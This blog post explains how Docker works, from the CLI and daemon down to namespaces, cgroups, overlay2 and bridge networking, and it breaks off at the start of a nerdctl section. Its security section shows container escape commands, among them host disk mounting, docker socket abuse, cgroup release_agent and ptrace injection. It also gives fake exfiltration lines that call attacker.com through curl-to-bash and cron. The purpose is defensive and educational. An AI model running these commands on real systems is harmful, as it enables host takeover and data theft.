Piyush Jajoo

Posted on Feb 5

How Docker Actually Works: A Deep Dive into the Internals

#docker #containers #linux #cloud

Most developers treat Docker as a black box — you write a Dockerfile, run docker up, and things just work. But what's actually happening under the hood? This post tears the curtain back and walks through every layer: from the CLI all the way down to Linux kernel primitives that make isolation possible.

The Big Picture
The Docker CLI and Client
The Docker Daemon (dockerd)
Images: Layered Filesystems
The Container Runtime: containerd and runc
Linux Namespaces: Isolation
cgroups: Resource Control
Union Filesystems and Storage Drivers
Networking Internals
The Full Lifecycle: Start to Finish
Security Surface and Attack Vectors
Docker vs. Podman vs. nerdctl vs. Kata Containers
Summary and Key Takeaways

1. The Big Picture

Before we descend into internals, it helps to have a map. Docker is not a single program — it's a stack of cooperating components. Each layer has a distinct job.

Every docker run command you've ever typed travels through this entire stack. Let's walk it top to bottom.

2. The Docker CLI and Client

The docker command you type in your terminal is just a client. It does almost nothing by itself — it serializes your intent into REST API calls and forwards them to the daemon.

Key facts about the CLI:

Communication happens over a Unix domain socket (/var/run/docker.sock), not TCP, for local interactions. This is why Docker commands feel instantaneous — there's no network round-trip.
The CLI speaks the Docker Engine API (a versioned REST API). You can call it directly with curl if you want: curl --unix-socket /var/run/docker.sock http://localhost/images/json.
The CLI is open source and replaceable. Tools like Podman, Buildx, and Docker Compose are all just different clients talking to compatible backends.

3. The Docker Daemon (dockerd)

The daemon is the brain. It's a long-running background process that manages the entire lifecycle of containers, images, volumes, and networks.

The daemon doesn't actually run containers itself anymore. That's a critical architectural decision made in 2017 — Docker extracted the container runtime into containerd (see Section 5). The daemon now acts as an orchestrator sitting above containerd, handling the higher-level logic like image pulls, build context, log streaming, and networking setup.

4. Images: Layered Filesystems

A Docker image is not a single monolithic file. It's a stack of read-only layers, each representing a single filesystem change made by a Dockerfile instruction. This is the foundation of Docker's efficiency.

4.1 How Layers Are Built

Each instruction in a Dockerfile that modifies the filesystem creates a new layer:

FROM ubuntu:22.04          # Layer 0: Base image (multiple layers itself)
RUN apt-get update         # Layer 1: Updated package index
RUN apt-get install -y nginx  # Layer 2: Nginx binaries + deps
COPY ./app /opt/app        # Layer 3: Your application code
CMD ["nginx", "-g", "daemon off;"]  # Metadata only — no new layer

4.2 Layer Sharing and The Content-Addressable Store

Every layer is identified by its SHA-256 hash of its contents. This gives Docker two powerful properties:

Deduplication: If two images share the same ubuntu:22.04 base, the layers on disk are stored only once. The hash is the same, so Docker knows they're identical.

Shared caching: When you rebuild an image and only change Layer 3, Docker reuses Layers 0–2 from cache. It only needs to rebuild from the point of change.

Notice how v1 and v2 share the first three layers (ubuntu base, apt-get update, nginx install). Only the final layer differs (app v1 vs. app v2). This is why docker pull is so fast for incremental updates — it only fetches the delta.

4.3 The OCI Image Manifest

When you pull an image, what actually comes over the wire is an OCI Image Manifest — a JSON document that lists all the layers, their hashes, and the image config:

{
  "schemaVersion": 2,
  "mediaType": "application/vnd.oci.image.manifest.v1+json",
  "config": {
    "mediaType": "application/vnd.oci.image.config.v1+json",
    "digest": "sha256:aaa...",
    "size": 7023
  },
  "layers": [
    { "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
      "digest": "sha256:abc1...", "size": 73400320 },
    { "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
      "digest": "sha256:def2...", "size": 15728640 },
    { "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
      "digest": "sha256:ghi3...", "size": 47185920 },
    { "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
      "digest": "sha256:jkl4...", "size": 5242880 }
  ]
}

The config blob contains the runtime metadata: environment variables, the entrypoint command, exposed ports, working directory, and the history of how each layer was built.

5. The Container Runtime: containerd and runc

This is where Docker hands off actual container creation to the Linux kernel. The runtime stack has two tiers.

containerd (High-Level Runtime)

containerd is a daemon that manages the lifecycle of containers at a level just above the kernel. It's responsible for:

Pulling and unpacking images into snapshots on disk
Managing snapshots via the storage driver (e.g., overlay2)
Invoking runc to actually create and start containers
Exposing a gRPC API that dockerd (and Kubernetes, via the CRI interface) uses

containerd is a CNCF graduated project — it's the same runtime Kubernetes uses under the hood. This is why you can swap Docker for containerd directly in production clusters.

runc (Low-Level Runtime)

runc is a tiny (~5MB) binary that does the actual heavy lifting of talking to the kernel. When you ask for a new container, runc does the following in sequence:

Reads the OCI runtime spec — a config.json generated by containerd that describes the desired container state
Calls clone() with namespace flags — this is the single syscall that creates a new process inside isolated namespaces
Sets up cgroups — attaches the new process to resource-limiting control groups
Mounts the filesystem — sets up the overlay filesystem, bind mounts, and the /proc and /sys pseudo-filesystems
Drops privileges — removes capabilities the container doesn't need
Execs the entrypoint — replaces itself with PID 1 inside the container

6. Linux Namespaces: Isolation

Namespaces are the kernel feature that makes containers feel like separate machines. Each namespace type isolates a different aspect of the OS. A container typically lives inside seven namespaces simultaneously.

Namespace Breakdown

Namespace	Isolates	What Happens Inside the Container
PID	Process IDs	Container's first process is always PID 1. It can't see or signal host processes.
NET	Network interfaces, routing tables, iptables	Container gets its own virtual NIC, its own IP, its own loopback.
MNT	Mount points	Container has its own filesystem tree. Host mounts are invisible.
UTS	Hostname & domain name	`hostname` returns the container's name, not the host's.
IPC	Inter-process communication (shared memory, semaphores, message queues)	Containers can't read each other's `/dev/shm`.
USER	User and group IDs	Maps container's root (UID 0) to an unprivileged host UID. Critical for security.
CGROUP	cgroup hierarchy view	Container sees only its own cgroup subtree, so it can't inspect resource limits of sibling containers.

The PID namespace is particularly elegant. When PID 1 inside a container exits, the entire container stops — just like how killing PID 1 on a real Linux machine shuts everything down. This is why your entrypoint process matters so much.

7. cgroups: Resource Control

While namespaces provide isolation (what you can see), cgroups provide control (what you can use). cgroups (control groups) are a Linux kernel feature that lets you partition system resources among processes.

Docker uses cgroups v2 (the unified hierarchy) on modern systems.

How Docker Maps Your Flags to cgroups

When you run:

docker run --cpus=0.5 --memory=512m --pids-limit=50 my-app

Docker translates these into cgroup filesystem writes:

Docker Flag	cgroup File	Value Written
`--cpus=0.5`	`cpu.max`	`50000 100000` (50ms per 100ms period)
`--memory=512m`	`memory.max`	`536870912` (bytes)
`--memory-swap=0`	`memory.swap.max`	`0`
`--pids-limit=50`	`pids.max`	`50`
`--blkio-weight=100`	`io.weight`	`100`

The kernel enforces these limits. If a container tries to allocate more memory than memory.max, the kernel's OOM killer kicks in and terminates the offending process. The container doesn't crash silently — it gets a 137 (SIGKILL) exit code.

8. Union Filesystems and Storage Drivers

Here's the problem: Docker images are read-only (they're just layers stacked on top of each other), but containers need to write files (logs, temp files, config changes). How do you let a container modify files without breaking the original image?

The solution is overlay2 — think of it like transparent sheets stacked on top of each other.

8.1 The Transparent Sheets Analogy

Imagine you have a stack of transparent sheets:

Bottom sheets (read-only): These are the Docker image layers. They contain /bin/bash, /usr/sbin/nginx, etc. You can look through them but you can't write on them.
Top sheet (writable): This is created fresh for each container. When you start a container, Docker puts a blank writable sheet on top.

When you look down from above, you see all the sheets merged together — this is what the container sees as its filesystem (/).

8.2 Three Scenarios: Read, Write, Delete

Let's walk through what happens when a container interacts with files:

Scenario 1: Reading an existing file

# Inside the container
cat /bin/bash

The file exists in the lower (image) layers
overlay2 reads it directly from there
No copying, instant access
Multiple containers reading the same file? They all read the same disk blocks — zero duplication

Scenario 2: Modifying an existing file

# Inside the container
echo "listen 8080;" >> /etc/nginx/nginx.conf

Here's where copy-on-write happens:

First: The file /etc/nginx/nginx.conf exists in the lower (image) layer
Container tries to write: overlay2 intercepts this
Copy entire file up: The whole file gets copied from the lower layer to the upper (writable) layer
Modify the copy: The container writes to the copy in the upper layer
Future reads: The container now sees the modified version (upper layer wins)

The original file in the lower layer is never touched — it stays pristine. When you stop and delete the container, the upper layer is destroyed. The image is unchanged.

Scenario 3: Creating a new file

# Inside the container
echo "Hello" > /opt/app/new-file.txt

This file doesn't exist in the image layers
It's created directly in the upper (writable) layer
Only this container sees it
When the container is deleted, the file vanishes

Scenario 4: Deleting a file that exists in the image

# Inside the container  
rm /etc/old-config

The file exists in the lower (image) layer — you can't actually delete it (it's read-only)
Instead, overlay2 creates a special whiteout file in the upper layer: .wh.old-config
When the kernel sees the whiteout file, it hides the original file from the lower layer
The container thinks the file is deleted, but it still exists in the image layer

8.3 Why This Matters

This design gives Docker three critical properties:

1. Disk efficiency: Starting 100 containers from the same image uses almost zero extra disk space initially. They all share the same read-only image layers. Only the writable upper layer (which starts empty) is unique per container.

2. Fast startup: No need to copy the entire filesystem — just create an empty upper layer and you're ready to go.

3. Image immutability: The original image layers are never modified. You can run a container, mess it up completely, delete it, and start fresh from the exact same image — nothing is corrupted.

8.4 The Full Picture

Here's how overlay2 actually mounts the filesystem:

# Simplified version of what Docker does behind the scenes
mount -t overlay overlay \
  -o lowerdir=/var/lib/docker/overlay2/l/LAYER1:/var/lib/docker/overlay2/l/LAYER2 \
  -o upperdir=/var/lib/docker/overlay2/abc123/diff \
  -o workdir=/var/lib/docker/overlay2/abc123/work \
  /var/lib/docker/overlay2/abc123/merged

lowerdir: The read-only image layers (colon-separated list)
upperdir: The writable layer for this specific container
workdir: Temporary scratch space overlay2 uses internally (you can ignore this)
merged: Where the unified view appears — this is what the container sees as /

When the container is deleted, Docker just removes the upperdir and workdir directories. The lowerdir (image layers) stay intact and can be reused immediately for the next container.

9. Networking Internals

Docker containers are isolated in their own network namespace — they have their own network stack, their own IP address, their own routing table. But how does traffic from the outside world reach them? And how do containers talk to each other?

The answer involves four key components working together like a postal system.

9.1 The Four Components

Think of Docker networking like a building's internal mail system:

veth pairs — Virtual cables connecting the container to the host (like a mail slot in each apartment door)
docker0 bridge — A virtual network switch that connects all containers (like the building's mailroom)
iptables DNAT — Rewrites destination addresses for incoming packets (like the front desk forwarding mail to apartments)
iptables SNAT — Rewrites source addresses for outgoing packets (like the building's return address on all outgoing mail)

9.2 The Big Picture: How Traffic Flows

Let's trace what happens when someone accesses your containerized nginx server with docker run -p 8080:80 nginx:

9.3 Step-by-Step: What Happens with `-p 8080:80`

Let's break down the journey of a single HTTP request step by step.

Setup (happens once at container start):

When you run docker run -p 8080:80 nginx, Docker does this:

Creates a veth pair — Two virtual network interfaces connected like a pipe. One end (veth1a2b3c) stays on the host, the other (eth0) goes into the container's network namespace.
Attaches the host end to docker0 — The docker0 bridge is a virtual Layer 2 switch. All container veth pairs plug into it, like devices plugged into a physical switch.
Assigns an IP to the container — The container's eth0 gets an IP from the bridge's subnet, usually 172.17.0.2/16. The bridge itself is 172.17.0.1.
Adds iptables rules:
- DNAT rule (PREROUTING chain): "If a packet arrives at port 8080, rewrite its destination to 172.17.0.2:80"
- SNAT rule (POSTROUTING chain): "If a packet from 172.17.0.0/16 is leaving the host, rewrite its source to the host's IP"

Request path (inbound traffic):

Now someone visits http://192.168.1.10:8080 from the internet:

① Packet arrives at host NIC

Source:      203.0.113.5:54321 (external client)
Destination: 192.168.1.10:8080 (host's public IP and exposed port)

② iptables DNAT rewrites destination

The PREROUTING rule fires:
-A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 172.17.0.2:80

Packet becomes:
Source:      203.0.113.5:54321 (unchanged)
Destination: 172.17.0.2:80 (container's IP and port)

③ Packet routed to docker0 bridge

The kernel's routing table sees destination 172.17.0.2 is on the docker0 subnet. It forwards the packet to the bridge.

④ Bridge forwards to correct veth

The bridge has learned which container has IP 172.17.0.2 (via ARP). It forwards the packet out the correct veth pair.

⑤ Packet arrives at container's eth0

Inside the container's network namespace, nginx sees:

Incoming connection from 203.0.113.5:54321 to 172.17.0.2:80

Nginx processes the request and sends a response.

Response path (outbound traffic):

⑥ Response leaves container

Source:      172.17.0.2:80 (container)
Destination: 203.0.113.5:54321 (original client)

⑦ Packet crosses veth pair to bridge

The container's default gateway is 172.17.0.1 (the bridge). Packet goes back through the veth pair to the host.

⑧ iptables SNAT rewrites source

The POSTROUTING rule fires:
-A POSTROUTING -s 172.17.0.0/16 ! -o docker0 -j MASQUERADE

This rule means: "For any packet from the 172.17.0.0/16 subnet (the docker0 bridge network)
that's NOT going out the docker0 interface (! -o docker0), apply MASQUERADE"

In our case, the packet from 172.17.0.2 matches this rule.

Packet becomes:
Source:      192.168.1.10:34567 (host's IP with a random high port chosen by kernel)
Destination: 203.0.113.5:54321 (unchanged)

What is 172.17.0.0/16? This is subnet notation (CIDR) representing the entire IP range that docker0 manages:

172.17.0.1 — docker0 bridge (gateway)
172.17.0.2 — Our container
172.17.0.3-255.255 — Other possible container IPs
172.17.0.0/16 — The whole subnet (all of the above)

Why SNAT? The external client sent the request to 192.168.1.10:8080. If the response came back from 172.17.0.2:80 (a private IP it's never heard of), the client's firewall would drop it as unsolicited traffic. SNAT rewrites the source to the host's IP.

The kernel maintains a connection tracking table (conntrack) that remembers:

Inbound: Client's packet to 192.168.1.10:8080 was DNATed to 172.17.0.2:80
Outbound: Container's response from 172.17.0.2:80 is SNATed to 192.168.1.10:34567

When the response packet reaches the client, conntrack ensures the client sees it as coming from the same endpoint it originally contacted (192.168.1.10:8080), making the whole exchange appear as a normal TCP connection.

⑨ Response sent to client

From the client's perspective, it had a normal TCP conversation with 192.168.1.10:8080. It has no idea a container was involved.

9.4 Container-to-Container Communication

When two containers on the same host talk to each other, it's much simpler — no NAT required:

Container A sends a packet to 172.17.0.3 (Container B's IP)
The packet goes through A's veth pair to the docker0 bridge
The bridge sees the destination MAC address (learned via ARP) and forwards directly to B's veth pair
Packet arrives at Container B — no address translation needed

This is why containers on the same Docker network can talk to each other using their container names as hostnames — Docker runs an embedded DNS server that resolves container names to their bridge IPs.

9.5 Why This Design?

This architecture gives Docker:

Isolation: Each container has its own network stack. One container can't sniff traffic from another (different network namespaces).

Portability: Containers always see themselves with the same internal IP (e.g., 172.17.0.2), regardless of what host IP they're running on.

Flexibility: You can expose different host ports (8080, 8081, 8082) all pointing to the same container port (80), allowing multiple containers to run the same service.

Performance: Container-to-container traffic never leaves the host — it's just a memory copy through the bridge. No network stack overhead.

The docker0 bridge is created automatically when Docker starts. You can see it with ip addr show docker0 on the host. Every running container gets a veth pair, and brctl show docker0 will list all the attached interfaces.

10. The Full Lifecycle: Start to Finish

Now let's put it all together. When you type docker run -p 8080:80 nginx, what actually happens? The answer involves five distinct phases, each handled by a different part of the stack.

10.1 The Five Phases

10.2 Phase-by-Phase Breakdown

Let's trace exactly what each component does.

Phase 1: Image Resolution (dockerd → Registry)

You:     docker run -p 8080:80 nginx
CLI:     Sends REST API call to dockerd
dockerd: "Do I have nginx:latest locally?"
         → Check local image cache
         → Missing! Need to pull from registry

dockerd → Registry:  GET /v2/library/nginx/manifests/latest
Registry → dockerd:  Here's the OCI manifest with 6 layer digests

dockerd: "Which layers do I already have?"
         → Check: sha256:abc123... ✅ (have it - ubuntu base)
         → Check: sha256:def456... ❌ (missing)
         → Check: sha256:789abc... ❌ (missing)

dockerd → Registry:  GET /v2/library/nginx/blobs/sha256:def456...
Registry → dockerd:  [compressed layer tarball]

dockerd: Unpacks layers to /var/lib/docker/overlay2/
         → Verifies SHA-256 checksums
         → Decompresses tarballs
         → Stores in content-addressable storage

Phase 2: Container Setup (dockerd → containerd)

dockerd → containerd: "Create a container from nginx:latest"
                      Here's the config: { Image: "nginx", Ports: {"80/tcp": {}} }

containerd: Generates OCI runtime specification (config.json):
            {
              "root": { "path": "/path/to/overlay2/merged" },
              "process": { "args": ["nginx", "-g", "daemon off;"] },
              "linux": {
                "namespaces": [
                  { "type": "pid" }, { "type": "network" }, ...
                ],
                "resources": { "memory": { "limit": -1 } }
              }
            }

containerd: Prepares overlay2 mount:
            - lowerdir: nginx image layers (read-only)
            - upperdir: /var/lib/docker/overlay2/abc123/diff (writable)
            - workdir:  /var/lib/docker/overlay2/abc123/work
            - merged:   /var/lib/docker/overlay2/abc123/merged (what container sees)

containerd → runc: "Create container with this config.json"

Phase 3: Kernel-Level Isolation (runc → Linux Kernel)

runc: Reads config.json
      → Time to talk to the kernel

runc → kernel: clone(CLONE_NEWPID | CLONE_NEWNET | CLONE_NEWNS | 
                     CLONE_NEWUTS | CLONE_NEWIPC | CLONE_NEWUSER |
                     CLONE_NEWCGROUP)
               "Create a new process with 7 isolated namespaces"

kernel: Creates namespace structures
        → New PID namespace: container's processes start at PID 1
        → New NET namespace: empty network stack
        → New MNT namespace: isolated filesystem view
        → (and 4 others...)

runc → kernel: Write cgroup limits to /sys/fs/cgroup/
               - cpu.max = 100000 (no limit)
               - memory.max = 536870912 (512 MiB)
               - pids.max = unlimited

runc → kernel: mount("overlay", "/var/lib/docker/overlay2/abc123/merged", ...)
               "Mount the overlay filesystem as the container's root"

runc → kernel: mount("proc", "/proc", "proc")
               mount("sysfs", "/sys", "sysfs")
               "Mount pseudo-filesystems inside container"

runc → kernel: prctl(PR_CAPBSET_DROP, CAP_SYS_ADMIN)
               "Drop dangerous capabilities - container can't break out"

Phase 4: Networking (dockerd → Linux Kernel)

dockerd: "Container created, now set up networking"

dockerd → kernel: ip link add veth0 type veth peer name veth1a2b3c
                  "Create a virtual ethernet cable (veth pair)"

dockerd → kernel: ip link set veth1a2b3c master docker0
                  "Plug host-end into the docker0 bridge"

dockerd → kernel: ip link set veth0 netns <container-pid>
                  "Move container-end into container's network namespace"

dockerd → kernel: (inside container namespace)
                  ip addr add 172.17.0.2/16 dev veth0
                  ip link set veth0 up
                  ip route add default via 172.17.0.1
                  "Configure container's network: IP, gateway, routes"

dockerd → kernel: iptables -t nat -A PREROUTING -p tcp --dport 8080 \
                           -j DNAT --to-destination 172.17.0.2:80
                  "Add port forwarding rule: 8080 → container:80"

dockerd → kernel: iptables -t nat -A POSTROUTING -s 172.17.0.0/16 \
                           ! -o docker0 -j MASQUERADE
                  "Add SNAT rule for outbound traffic"

Phase 5: Process Launch (runc → Container)

runc: Everything is ready - namespaces, cgroups, filesystem, network
      → Time to start the actual application

runc → kernel: execve("/usr/sbin/nginx", ["nginx", "-g", "daemon off;"])
               "Replace this process with nginx"

kernel: Inside the container:
        → PID 1 is now nginx (not init!)
        → Sees only its own process tree
        → Sees only its own network interfaces (eth0 = 172.17.0.2)
        → Sees only its own filesystem (overlayfs merged view)

nginx: Starts listening on 0.0.0.0:80 (inside the container)

nginx → kernel: bind(sockfd, { 0.0.0.0:80 })
kernel: "Bound to port 80 in this network namespace"

runc → containerd: "Container is running, PID 1 active"
containerd → dockerd: "Container abc123 status: running"
dockerd → CLI: { "Id": "abc123...", "Status": "running" }
CLI → You: abc123def456...

10.3 The Complete Timeline

Here's how fast it all happens:

Time	What's Happening
0ms	You press Enter on `docker run`
5ms	CLI sends REST call to dockerd
10-200ms	Phase 1: Image pull (if needed) - can be ~0ms if cached
210ms	Phase 2: containerd generates config
220ms	Phase 3: runc creates namespaces & cgroups
240ms	Phase 4: Network setup (veth, bridge, iptables)
250ms	Phase 5: execve("nginx") - PID 1 starts
270ms	nginx binds to port 80
300ms	nginx is serving traffic
~500ms	Total time (cold start with image pull)

If the image is already cached, the cold-start time drops to ~100ms — just the namespace creation and process launch.

Compare this to a VM:

Boot time: 20-60 seconds
Memory overhead: 512MB minimum for guest OS
Disk overhead: Full OS image (1-10GB)

Docker's speed comes from not booting an OS. It's just process isolation with namespace boundaries — the kernel is already running.

11. Security Surface and Attack Vectors

Understanding internals means understanding where things can go wrong. The container boundary is enforced by kernel features, not by a hypervisor. This is both Docker's strength (speed, efficiency) and its weakness (shared kernel = shared attack surface).

Every security discussion about containers comes down to one fundamental question: What happens if a malicious process inside a container tries to break out?

11.1 The Threat Landscape

The security model is defense in depth — multiple layers that must all be bypassed for a successful container escape.

11.2 Attack Vector 1: Privileged Mode (`--privileged`)

What it is:

docker run --privileged malicious-image

What it does: Disables every single security boundary we've discussed:

✅ Namespaces still exist, but capabilities are not dropped
✅ cgroups still limit resources, but not access
❌ All capabilities granted (CAP_SYS_ADMIN, CAP_NET_ADMIN, etc.)
❌ /dev is fully exposed (block devices, hardware)
❌ seccomp disabled
❌ AppArmor/SELinux disabled

The attack:

# Inside a privileged container
mkdir /mnt/host
mount /dev/sda1 /mnt/host  # Mount the host's root filesystem
chroot /mnt/host           # Change root to host filesystem
# You're now effectively root on the host
cat /etc/shadow            # Read host passwords

Why it works: With CAP_SYS_ADMIN and full /dev access, the attacker can mount the host's block devices and access the entire filesystem. The namespace boundary becomes meaningless.

Defense: Never use --privileged in production. If you need specific capabilities (e.g., CAP_NET_ADMIN for network tools), grant them individually:

docker run --cap-add=NET_ADMIN --cap-drop=ALL my-image

11.3 Attack Vector 2: Kernel Vulnerabilities (Shared Kernel)

The fundamental problem: All containers share the host's kernel. A kernel exploit in one container = full host compromise.

Real-world example: CVE-2019-5736 (runc escape)

This was a critical vulnerability in runc itself. Here's how it worked:

# Attacker prepares a malicious container entrypoint
# The entrypoint overwrites /proc/self/exe (which points to runc on the host)

# When the container starts:
# 1. dockerd calls runc to launch the container
# 2. runc forks and execs the container's entrypoint
# 3. The malicious entrypoint overwrites /proc/self/exe
# 4. Because /proc/self/exe is a symlink to the runc binary on the host...
# 5. The attacker has now overwritten the host's runc binary
# 6. Next time anyone runs 'docker exec', the malicious runc executes on the host

Why it works: /proc/self/exe is a special symlink that points to the currently executing binary. For runc, this points to the host's /usr/bin/runc. Because the attacker had write access to this symlink from inside the container, they could overwrite the host binary.

Defense mechanisms:

1. seccomp profiles — Whitelist only the syscalls the container actually needs:

{
  "defaultAction": "SCMP_ACT_ERRNO",
  "syscalls": [
    { "names": ["read", "write", "open", "close", "stat"], "action": "SCMP_ACT_ALLOW" },
    { "names": ["mount", "ptrace", "reboot"], "action": "SCMP_ACT_ERRNO" }
  ]
}

Docker's default seccomp profile blocks ~44 dangerous syscalls including:

mount / umount
reboot / sethostname
ptrace (process tracing)
keyctl (kernel key management)

2. Keep kernel & runtime updated: CVE-2019-5736 was patched in runc 1.0-rc7. The fix was simple: mark /proc/self/exe as read-only.

11.4 Attack Vector 3: Mounted Docker Socket

What it is:

docker run -v /var/run/docker.sock:/var/run/docker.sock attacker-image

What it does: Gives the container full control over the Docker daemon.

The attack:

# Inside the container with the socket mounted
apk add docker-cli  # Install Docker CLI inside container

# Now the attacker can create their own privileged container
docker run -v /:/host --privileged -it alpine sh

# This new container has:
# - Full access to host filesystem (mounted at /host)
# - --privileged mode (all capabilities)
# - Running as root on the host

Why it works: The Docker socket is the control plane. Anyone who can write to /var/run/docker.sock can instruct the daemon to create containers with arbitrary configurations — including privileged containers, bind mounts of the host filesystem, and more.

Defense:

Never mount the Docker socket into untrusted containers
If you must (e.g., for CI/CD tools like Portainer, Traefik), use socket proxies that filter allowed API calls:

  # Use tecnativa/docker-socket-proxy to restrict allowed operations
  docker run -v /var/run/docker.sock:/var/run/docker.sock \
             -e CONTAINERS=1 -e POST=0 \
             tecnativa/docker-socket-proxy

11.5 Attack Vector 4: Dangerous Capabilities

Linux capabilities break down root's powers into ~40 distinct privileges. By default, Docker drops most of them, but some workloads require specific capabilities back.

Dangerous capabilities:

CAP_SYS_ADMIN — The "god mode" capability. Allows:

Mounting filesystems
Creating namespaces
Loading kernel modules
Basically everything that defines "root"

Attack with CAP_SYS_ADMIN:

# Container started with --cap-add=SYS_ADMIN
mkdir /mnt/cgroup
mount -t cgroup -o memory memory /mnt/cgroup
echo $$ > /mnt/cgroup/release_agent  # Escape via cgroup release_agent

CAP_SYS_PTRACE — Allows attaching to any process:

# Attach to dockerd or another container's PID 1
gdb -p <dockerd-pid>
# Inject shellcode, steal secrets, modify memory

CAP_NET_ADMIN — Network configuration:

# Create network namespaces, sniff traffic
ip netns add attacker
# Modify iptables rules
iptables -F  # Flush all rules

Defense:

# Start with nothing, add only what's needed
docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE my-image

# Audit what capabilities your containers actually use
docker inspect <container> | jq '.[].HostConfig.CapAdd'

11.6 Attack Vector 5: Supply Chain (Compromised Images)

The scenario: You run docker pull nginx and execute code you've never audited.

What could go wrong:

Backdoored base images:

# Looks innocent
FROM ubuntu:22.04
RUN apt-get update && apt-get install -y nginx

# But the Dockerfile also did this:
RUN curl http://attacker.com/backdoor.sh | bash
RUN echo "* * * * * curl http://attacker.com/exfil.sh | bash" > /etc/cron.d/exfil

Crypto miners: Many compromised images quietly mine cryptocurrency, consuming CPU that you pay for in cloud bills.

Data exfiltration: The container can read environment variables (docker run -e DATABASE_PASSWORD=secret), mounted volumes, and make outbound network connections.

Defense layers:

1. Image scanning: Scan for known CVEs before running:

# Using Trivy (open source)
trivy image nginx:latest

# Example output:
# nginx:latest (ubuntu 22.04)
# Total: 24 (CRITICAL: 2, HIGH: 8, MEDIUM: 14)
# CVE-2023-1234 | CRITICAL | openssl | 3.0.2-0ubuntu1 | Buffer overflow

2. Content trust / image signing:

# Enable Docker Content Trust
export DOCKER_CONTENT_TRUST=1

# Only pull images signed with trusted keys
docker pull nginx:latest
# Error: No trust data for latest

3. Use distroless or minimal base images:

# Instead of ubuntu (72MB with shell, package manager, etc.)
FROM gcr.io/distroless/base-debian11  # 20MB, no shell, no package manager

COPY my-app /app
CMD ["/app"]

Why? No shell = attacker can't run curl | bash even if they compromise the app.

4. Run as non-root user:

FROM ubuntu:22.04
RUN useradd -u 1001 -m appuser
USER appuser
CMD ["./my-app"]

Now if the app is compromised, the attacker is UID 1001, not root.

11.7 Defense in Depth: How the Layers Work Together

Here's a concrete example of how multiple defenses stop an attack:

Scenario: An attacker exploits an RCE vulnerability in your web app running in a container.

Step 1: Attacker gets code execution inside container
        → They're running as UID 1001 (non-root user)

Step 2: Attacker tries: mount /dev/sda1 /mnt
        → BLOCKED by capabilities (no CAP_SYS_ADMIN)

Step 3: Attacker tries: docker run --privileged (via mounted socket)
        → BLOCKED - no Docker socket mounted

Step 4: Attacker tries: apt-get install nmap
        → BLOCKED - running distroless image (no package manager)

Step 5: Attacker tries: reboot
        → BLOCKED by seccomp (reboot syscall not allowed)

Step 6: Attacker tries: while true; do :; done &  (fork bomb)
        → BLOCKED by cgroups (pids.max = 100)

Step 7: Attacker tries: dd if=/dev/zero of=/file bs=1G count=100
        → BLOCKED by cgroups (disk I/O limits)

Step 8: Attacker tries: curl http://attacker.com/exfil < /app/secrets.txt
        → WORKS - but secrets aren't in the container (mounted as read-only volume)

Step 9: Attacker tries: rm -rf /app
        → BLOCKED - filesystem mounted read-only (--read-only flag)

Even with RCE, the attacker can't escape, can't persist, can't exfiltrate sensitive data, and can't cause resource exhaustion.

11.8 Hardening Checklist

Here's a practical checklist for production containers:

docker run \
  # Drop all capabilities, add back only what's needed
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \

  # Run as non-root
  --user 1001:1001 \

  # Read-only root filesystem
  --read-only \
  --tmpfs /tmp:rw,noexec,nosuid,size=100m \

  # Limit resources
  --memory=512m \
  --cpus=1.0 \
  --pids-limit=100 \

  # Enable security profiles
  --security-opt=no-new-privileges \
  --security-opt=seccomp=/path/to/custom-seccomp.json \
  --security-opt=apparmor=docker-default \

  # Network isolation
  --network=isolated-net \

  # Never do this:
  # --privileged                          # NO!
  # -v /var/run/docker.sock:/var/...      # NO!
  # -v /:/host                             # NO!
  # --cap-add=SYS_ADMIN                    # NO!

  my-app:latest

11.9 The Bottom Line

Docker's security model is kernel-based isolation, not hypervisor-based isolation. This means:

✅ Fast: No VM overhead
✅ Efficient: Shared kernel, minimal duplication
❌ Shared attack surface: One kernel vulnerability can break all containers

For untrusted workloads (running customer code, multi-tenant SaaS), consider:

Kata Containers (VM-based isolation - see Section 12)
gVisor (userspace kernel emulation)
Firecracker (microVMs)

For trusted workloads (your own apps), Docker's default security + hardening is sufficient — just follow the checklist above.

The key insight: Security isn't binary. It's about reducing the blast radius when (not if) something goes wrong.

12. Docker vs. Podman vs. nerdctl vs. Kata Containers

Now that we've internalized how Docker works layer by layer, the natural question is: what are the alternatives, and where do they diverge at the architectural level? This section isn't a feature checklist — it's a structural comparison. Every difference traced below maps directly to the internals we covered above.

12.1 Architectural Comparison at a Glance

The single biggest differentiator across all these tools is where in the stack they place the daemon — or deliberately remove it.

12.2 Docker — The Daemon-Centric Model

Docker's architecture is exactly what we dissected in Sections 2–5. The defining characteristic is the persistent root daemon (dockerd). Every container operation routes through it. This gives Docker a centralized control plane — easy to manage, easy to expose remotely via API — but it also means:

A single daemon crash can bring down all containers on that host.
The daemon socket (/var/run/docker.sock) is a high-value attack target. Anyone who can write to it has full host control.
Docker does offer a rootless mode (introduced in 2021), but it works by launching a user-space daemon that mimics the traditional architecture rather than removing the daemon entirely. It improves security but retains the fundamental client-server shape.

Docker's strength remains its ecosystem — over 20 million developers, deep integration with CI/CD platforms (GitHub Actions, Jenkins, GitLab), and Docker Hub as the dominant public registry.

12.3 Podman — The Daemonless, Rootless Alternative

Podman (created by Red Hat) flips the architectural model. There is no persistent background daemon. When you run podman run nginx, the CLI directly forks a child process that invokes runc (or crun). Each container is a direct child of your shell or of systemd — the process tree looks like normal user processes.

The security implications are substantial. Podman does not use a central daemon — each container starts as a child process of the user session that launched it. There is no persistent background service and no privileged socket running in the system. This removes the daemon as an attack surface entirely.

Rootless operation is where Podman's architecture truly shines. Podman allows regular unprivileged users to run containers without requiring any root privileges on the host, leveraging user namespaces: inside the container, processes can run as root (UID 0) but that root is mapped to an unprivileged user ID on the host.

Podman's networking in rootless mode uses slirp4netns or the newer pasta backend (introduced in Podman 5.0+) for user-mode networking, rather than Docker's privileged bridge + iptables approach. This is a meaningful trade-off: Docker's mature, privileged networking can achieve higher throughput (8–10 Gbps), while rootless Podman networking, though much improved with the pasta backend, typically peaks around 2–4 Gbps.

Podman also has a native concept of pods — groups of containers that share a network namespace — which maps directly to the Kubernetes Pod model. You can use podman generate kube to create Kubernetes manifests directly from running containers, and podman play kube to deploy them.

12.4 nerdctl — Direct Access to containerd

